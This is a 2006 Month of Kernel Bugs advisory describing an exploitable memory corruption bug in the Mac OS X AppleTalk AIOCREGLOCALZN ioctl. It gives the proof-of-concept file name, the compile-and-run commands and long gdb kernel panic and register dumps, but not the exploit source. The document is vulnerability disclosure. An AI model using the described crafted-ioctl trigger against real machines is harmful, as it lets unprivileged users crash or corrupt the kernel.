MOKB-27-11-2006 OMG! PWNIES! M4C BUGS NOW COME IN P1NK!

Bug details
Title:	Mac OS X AppleTalk AIOCREGLOCALZN Ioctl Memory Corruption
Description:	Mac OS X AppleTalk protocol handling code is vulnerable to an exploitable memory corruption issue. This particular vulnerability is caused by failure to validate input data in the AIOCREGLOCALZN ioctl command, and can be abused by unprivileged users by opening an AppleTalk socket and issuing the ioctl control command with a crafted data structure.
Author/Contributor:	LMH <lmh [at] info-pull.com> - discovery, MoKB release, debugging.
References:	Mac OS X XNU source code for AppleTalk
Proof of concept or exploit:	The following proof of concept / exploit can be used to reproduce the bug (requires Xcode/GNU GCC compiler to be installed): MOKB-27-11-2006.c (x86) gcc MOKB-27-11-2006.c -o MOKB-27-11-2006 && ./MOKB-27-11-2006 Note: AppleTalk stack must have been started: sudo appletalk -u en0
Debugging information:	It's been tested on an up-to-date (27-11-2006) Mac OS X installation, running on an Intel "shipping" Mac (x86). alkali:/tmp lmh$ $ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-a16a4845 GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-apple-darwin"... #0 Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770 Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines. (gdb) source /Volumes/KernelDebugKit/kgmacros Loading Kernel GDB Macros package. Type "help kgm" for more info. (gdb) paniclog panic(cpu 1 caller 0x001A3135): Unresolved kernel trap (CPU 1, Type 14=page fault), registers: CR0: 0x80010033, CR2: 0x00000000, CR3: 0x00d72000, CR4: 0x000006e0 EAX: 0x00000000, EBX: 0x00000000, ECX: 0x000000f4, EDX: 0x000000f5 CR2: 0x00000000, EBP: 0x00000000, ESI: 0x00000000, EDI: 0x00000000 EFL: 0x00010206, EIP: 0x00000000, CS: 0x00000004, DS: 0x0000000c Backtrace, Format - Frame : Return Address (4 potential args on stack) 0x13ef39d8 : 0x128d1f (0x3c9540 0x13ef39fc 0x131df4 0x0) 0x13ef3a18 : 0x1a3135 (0x3cf1f4 0x1 0xe 0x3cea24) 0x13ef3b28 : 0x19a8d4 (0x13ef3b38 0xf457b9e1 0xe 0x39210048) Backtrace terminated-invalid frame pointer 0x0 Kernel version: Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006; root:xnu-792.13.8.obj~1/RELEASE_I386 (gdb) info registers eax 0x0 0 ecx 0x0 0 edx 0x0 0 ebx 0x1 1 esp 0x13ef394c 0x13ef394c ebp 0x13ef39d8 0x13ef39d8 esi 0x1 1 edi 0x1000 4096 eip 0x1a8674 0x1a8674 eflags 0x0 0 cs 0x0 0 ss 0x0 0 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) showcurrentstacks task vm_map ipc_space #acts pid proc command 0x025bfda0 0x013d6f3c 0x02589ef0 45 0 0x004d2200 kernel_task activation thread pri state wait_queue wait_event 0x025dec64 0x025dec64 0 IR reserved_stack=0x13e10000 kernel_stack=0x13fe0000 stacktop=0x13fe3f18 0x13fe3f18 0x1a42f5 <machine_idle_cstate+32> 0x13fe3f38 0x19d871 <machine_idle+128> 0x13fe3f58 0x135f23 <idle_thread+96> 0x13fe3fc8 0x19a74c <call_continuation+28> stackbottom=0x13fe3fc8 task vm_map ipc_space #acts pid proc command 0x025bce60 0x013d67d0 0x02589550 1 188 0x02c1f7d0 appletalk1 activation thread pri state wait_queue wait_event 0x0272dd08 0x0272dd08 31 R kernel_stack=0x13ef0000 stacktop=0x13ef39d8 0x13ef39d8 0x128d1f <panic+382> 0x13ef3a18 0x1a3135 <kernel_trap+1538> 0x13ef3b28 0x19a8d4 <trap_from_kernel+19> stackbottom=0x13ef3b28 (gdb) showmapvme 0x013d67d0 vm_map pmap vm_size #ents rpage hint first_free 0x013d67d0 0x025c1d50 0x21a9c000 21 84 0x02c477bc 0x02c771e4 entry start prot #page object offset 0x02bf9688 0x0000000000000000 00C 1 0x00000000 0x0000000000000000 0x02cdb1b8 0x0000000000001000 57Cn 1 0x02cee2a8 0x0000000000000000 0x02cdb5ac 0x0000000000002000 33C 1 0x02bb3bb0 0x0000000000000000 0x02b948c4 0x0000000000003000 33C 1 0x00000000 0x0000000000000000 0x02b94554 0x0000000000004000 77C 1 0x02cc3d48 0x0000000000000000 0x02c771e4 0x0000000000005000 13Cn 1 0x02cee2a8 0x0000000000003000 0x02ce89a0 0x0000000000100000 37C 261 0x02d94908 0x0000000000000000 0x02c77318 0x0000000000300000 37C 261 0x02e0df68 0x0000000000000000 0x02d5c0b0 0x0000000000800000 37C 2056 0x02c4a088 0x0000000000000000 0x02cdb580 0x0000000001800000 37C 2056 0x02886908 0x0000000000000000 0x02c77294 0x000000008fe00000 57Cn 74 0x027e2770 0x00000000000d4000 0x02cc25ac 0x000000008fe4a000 37C 7 0x02d94198 0x0000000000000000 0x02c930dc 0x000000008fe51000 37C 3 0x02c94770 0x0000000000000000 0x02c80c34 0x000000008fe54000 77Cn 1 0x027e2770 0x0000000000125000 0x02c77790 0x000000008fe55000 17Cn 20 0x027e2770 0x0000000000126000 0x02d5e1e4 0x0000000090000000 11Ss 65536 0x013d6ce4 0x0000000000000000 0x02c477bc 0x00000000a0000000 33C 10 0x02e17990 0x0000000000000000 0x02c4d4fc 0x00000000a000a000 33C 7 0x02bd0b28 0x0000000000000000 0x02cc2840 0x00000000a0011000 11Ss 65519 0x013d6c80 0x0000000000011000 0x02c6c604 0x00000000bf800000 37C 2048 0x02df9ee0 0x0000000000000000 0x02ce8478 0x00000000fffec000 55- 19 0x025b7660 0x0000000000000000 (gdb) x/24x 0x13ef3b28 0x13ef3b28: 0x00000000 0x0019a8d4 0x13ef3b38 0xf457b9e1 0x13ef3b38: 0x0000000e 0x39210048 0x0000000c 0x0000000c 0x13ef3b48: 0x0000000c 0x00000000 0x00000000 0x00000000 0x13ef3b58: 0x00000000 0x00000000 0x000000f5 0x000000f4 0x13ef3b68: 0x00000000 0x0000000e 0x00000010 0x00000000 0x13ef3b78: 0x00000004 0x00010206 0x00000000 0x00000000 <-- (gdb) x/24x 0x13ef39d8 0x13ef39d8: 0x13ef3a18 0x00128d1f 0x003c9540 0x13ef39fc 0x13ef39e8: 0x00131df4 0x00000000 0x9894bec8 0x0000000e 0x13ef39f8: 0x13ef3a18 0x13ef3a70 0x003d0384 0x0000000e 0x13ef3a08: 0x00000000 0x80010033 0x00000001 0x003cea24 <-- 0x13ef3a18: 0x13ef3b28 0x001a3135 0x003cf1f4 0x00000001 0x13ef3a28: 0x0000000e 0x003cea24 0x80010033 0x00000000 <--